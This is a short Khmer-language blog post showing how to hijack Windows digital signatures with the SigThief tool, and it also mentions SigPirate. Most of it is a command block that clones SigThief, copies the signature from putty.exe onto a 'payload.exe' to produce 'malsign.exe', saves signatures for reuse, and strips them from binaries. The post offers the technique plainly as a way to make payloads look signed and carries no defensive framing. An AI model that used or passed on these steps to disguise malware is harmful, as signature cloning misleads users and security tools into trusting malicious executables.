This page looks best with JavaScript enabled

Hijacking Digital Signatures

 ·  β˜• 1 min read  ·  🐱 thik

αž˜αžΆαž“αžœαž·αž’αžΈαžŸαžΆαžŸαŸ’αžαŸ’αžšαž‡αžΆαž…αŸ’αžšαžΎαž“αž€αŸ’αž“αž»αž„αž€αžΆαžšαž›αž½αž…αž™αž€ ឬ αž…αž˜αŸ’αž›αž„αž™αž€ Digital Signatures αž…αŸαž‰αž–αžΈαž―αž€αžŸαžΆαžšαž–αž·αžαž”αŸ’αžšαžΆαž€αžŠαžŽαžΆαž˜αž½αž™αž“αŸ…αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αžœαžΈαž“αžŠαžΌ αŸ” αžαŸ‚αžαŸ’αž„αŸƒαž“αŸαŸ‡αž™αžΎαž„αž“αžΉαž„αž˜αž€αž˜αžΎαž›αž§αž”αž€αžšαžŽαŸαž˜αž½αž™αžŠαŸ‚αž›αž’αžΆαž…αž‡αž½αž™αž²αŸ’αž™αž˜αžΆαž“αž—αžΆαž–αž„αžΆαž™αžŸαŸ’αžšαž½αž›αž€αŸ’αž“αž»αž„αž€αžΆαžšαž›αž½αž…αž™αž€ Signatures αžŠαŸ‚αž›αž˜αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αž―αž€αžŸαžΆαžš Binary αžšαž½αž…αžŠαžΆαž€αŸ‹αž”αž‰αŸ’αž‡αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„ Payload αž”αžΆαž“αž™αŸ‰αžΆαž„αž†αžΆαž”αŸ‹αžšαž αŸαžŸ αŸ”

Digital Signatures Hijacking Tools

SigThif αž„αžΆαž™αŸ—αž‡αžΆαž˜αž½αž™ SigThif αž€αŸ’αž“αž»αž„αž€αžΆαžšαž›αž½αž…αž™αž€ Signatures αž–αžΈαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž‡αžΆαž…αŸ’αžšαžΎαž“αž“αŸ…αž€αŸ’αž“αž„αžœαžΈαž“αžŠαžΌ αŸ”

αžœαž·αž’αžΈαž”αŸ’αžšαžΎ
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

git clone https://github.com/secretsquirrel/SigThief.git
cd SigThief

// αž›αž½αž…αž™αž€ Signature αž…αŸαž‰αž–αžΈαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαžšαž½αž…αžŠαžΆαž€αŸ‹αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„ Payload
python3 sigthief.py -i putty.exe -t payload.exe -o malsign.exe

// αž™αž€ Signature αž…αŸαž‰ αž“αž·αž„αžšαž€αŸ’αžŸαžΆαž‘αž»αž€αž”αŸ’αžšαžΎαž–αŸαž›αž€αŸ’αžšαŸ„αž™
python3 sigthief.py -i putty.exe -r

// αž™αž€ Signature αžŠαŸ‚αž›αžšαž€αŸ’αžŸαžΆαž‘αž»αž€αž˜αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžœαž·αž‰
python3 sigthief.py -s putty.exe_sig -t payload.exe

// αž›αž»αž” Signature αž…αŸαž‰αž–αžΈ Binary
python3 sigthief.py -i anybinary.exe -T

Raw Code Pastebin

αž€αŸαž˜αžΆαž“αž§αž”αž€αžšαžŽαŸαž˜αž½αž™αž‘αŸ€αžαžŠαŸ‚αžš αžŠαŸ‚αž›αž’αžΆαž…αž”αŸ’αžšαžΎαž”αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αžœαžΈαž“αžŠαžΌαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ SigPirate αžŠαŸ‚αž›αž˜αžΆαž“αž—αžΆαž–αž„αžΆαž™αžŸαŸ’αžšαž½αž›αž”αŸ’αžšαžΎαžŠαžΌαž…αž‚αŸ’αž“αžΆ αŸ•

Share on
Thik
WRITTEN BY
thik
Security Researcher

See Also